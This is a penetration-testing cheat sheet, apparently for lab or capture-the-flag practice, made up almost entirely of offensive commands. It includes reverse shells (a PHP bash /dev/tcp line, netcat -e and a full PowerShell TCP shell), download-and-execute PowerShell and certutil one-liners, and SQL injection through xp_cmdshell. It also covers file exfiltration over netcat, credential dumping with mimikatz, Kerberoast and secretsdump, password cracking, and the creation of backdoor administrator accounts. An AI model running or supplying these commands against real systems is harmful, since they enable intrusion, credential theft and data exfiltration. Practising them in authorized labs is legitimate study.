(Bad Characters: 0x00, 0x0A)
- Fuzzing
- Finding eip position
- Finding bad chars
- Locating jmp esp
- Generating payload with msfvenom
- Getting reverse shell with netcat
- host -t axfr HTB.local
- host -l HTB.local
- host -l
- dig @ axfr
#Wget Transfer How to retrieve file(s) from host (inside a reverse shell)
1. Place file you want transferred in /var/www/html/
2. # service apache2 start
3. # wget http://10.10.10/pspy64 <- for single file
4. # wget -r <- for folder
#TFTP Transfer (How to transfer from Kali to Windows) Using MSF. Start MSF before starting these steps:
1. use auxiliary/server/tftp
2. set TFTPROOT /usr/share/mimikatz/Win32/
3. run
4. tftp -i GET mimikatz.exe
#NC (Windows to Kali)
1. nc -nv 4444 < bank-account.zip
2. nc -nlvp 4444 > bank-account.zip
1. Invoke-WebRequest -Uri -OutFile C:\Users\Victim\exploit.py
Without an interactive powershell session:
1. Create wget.ps1
$url = "http://<attacker-ip>/file.txt"   # placeholder: URL of the file to fetch ($url was undefined in the original script)
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
local system:
1. cat exploit.py | base64
2. echo "base64string==" | base64 -d >> exploit.py
local system (either python2/3):
1. python -m SimpleHTTPServer 80
1b. python3 -m http.server 80
2. certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip
- GetUserSPNs.py -request -dc-ip <DC_IP> <domain/user>
- powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
- impacket-secretsdump -just-dc-ntlm /@<DOMAIN_CONTROLLER> -outputfile filename.hashes
- _<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
- Refer to LFI / RFI section at the top of the page ^^
- EXEC master..xp_cmdshell 'whoami';
- meh' exec master..xp_cmdshell 'whoami' --
- user:$1$AbCdEf123/:16903:0:99999:7:::
- hashcat -m 500 -a 0 -o cracked_password.txt --force MD5_hash.txt /usr/share/wordlists/rockyou.txt
- user:$1$AbCdEf123/:16903:0:99999:7:::
- john --rules --wordlist=/usr/share/wordlists/rockyou.txt MD5_hash.txt
- non staged = netcat
- staged = multi/handler
- grep -Ri 'password' .
- find / -perm -4000 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} \;
- which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null (then ls -la, look for 777 file permissions).
- churrasco -d "net user /add "
- churrasco -d "net localgroup administrators /add"
- churrasco -d "NET LOCALGROUP \"Remote Desktop Users\" /ADD"
- Mimikatz.exe (run it)
- privilege::debug
- sekurlsa::logonpasswords
- ssh root@ -R 1234:
- reconnoitre -t -o . --services --quick --hostnames
- nmap -vvv -sC -sV -p- --min-rate 2000
- nmap -sT -p 22,80,110 -A
- nmap -p- -iL ips.txt > TCP_Ports.txt
#UDP (can take hours so maybe netstat is a better alternative)
- nmap -sU --top-ports 10000
- nmap -sT -sU -p 22,80,110 -A
- nmap -sT -sU -p- --min-rate 2000
- nmap -p- -sU -iL ips.txt > udp.txt
- nmap -sU -sV -iL ips.txt > alludpports.txt
#SNMP nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)
#SSH nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt
#SSL nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt
- powershell -ExecutionPolicy ByPass -File script.ps1
- sshuttle -r user@
- rdesktop -u user -p password -g 85% -r disk:share=/root/
- nc [YourIPaddr] [port] -e cmd.exe
- python -c 'import pty; pty.spawn("/bin/bash");'
- In reverse shell:
1. python -c 'import pty; pty.spawn("/bin/bash")'
2. Ctrl+Z (background the shell)
- In Kali
3. stty raw -echo
4. fg
- In reverse shell
5. reset (sometimes optional)
6. export SHELL=bash
7. export TERM=xterm-256color
8. stty rows <num> columns <cols> (optional)
- perl -e 'exec "/bin/sh";'
- perl: exec "/bin/sh";
/bin/sh -i
Linux netstat syntax
- netstat -tulpn | grep LISTEN
FreeBSD/MacOS X netstat syntax
- netstat -anp tcp | grep LISTEN
- netstat -anp udp | grep LISTEN
OpenBSD netstat syntax
- netstat -na -f inet | grep LISTEN
- netstat -nat | grep LISTEN
Nmap scan syntax
- sudo nmap -sT -O localhost
- sudo nmap -sU -O ##[ list open UDP ports ]##
- sudo nmap -sT -O ##[ list open TCP ports ]##
- smbmap -H
- smbclient -L
- smbclient //$
- Impacket's PSEXEC (After creating a remote port fwd) /usr/share/doc/python-impacket/examples/psexec.py user@
Password: (password)
[*] Trying protocol 445/SMB...
- Impacket's SMBServer (For File Transfer)
- cd /usr/share/windows-binaries
- python /usr/share/doc/python-impacket/examples/smbserver.py a .
- \\\a\mimikatz.exe
- systemctl restart open-vm-tools.service
- python -m SimpleHTTPServer 80
- python3 -m http.server 80
- ngrok http 80
#Web Scanning with extensions
Linux (Example web server might be Apache)
gobuster -e -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401
Windows (Example web server might be IIS)
gobuster -e -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401
Linux (Example web server might be Apache)
python3 dirsearch.py -r -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50
Windows (Example web server might be IIS)
python3 dirsearch.py -r -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50
- gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
- gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69
- gobuster -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
- nikto -h -p 80
#Nikto HTTPS
- nikto -h -p 443
- wfuzz -u "http://google.com/login.php?username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt
- wfuzz -u -w /usr/share/wfuzz/wordlist/general/common.txt
- Reverse Powershell: (sometimes powershell or echo may need to be in front of the string and sometimes quotes may be needed, e.g. powershell IEX or powershell "IEX..etc" or echo IEX).
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- If one has a Command Prompt shell, this will grab PowerUp from a local web server and run it on the compromised shell:
echo IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -
IEX(New-object Net.WebClient).DownloadString('')
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"
- Reverse Powershell using mssql:
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"\")
- net user
- net localgroup Users
- net localgroup Administrators
- net user USERNAME NEWPASS /add
- net user "USER NAME" NEWPASS /add
- net localgroup administrators USERNAME /add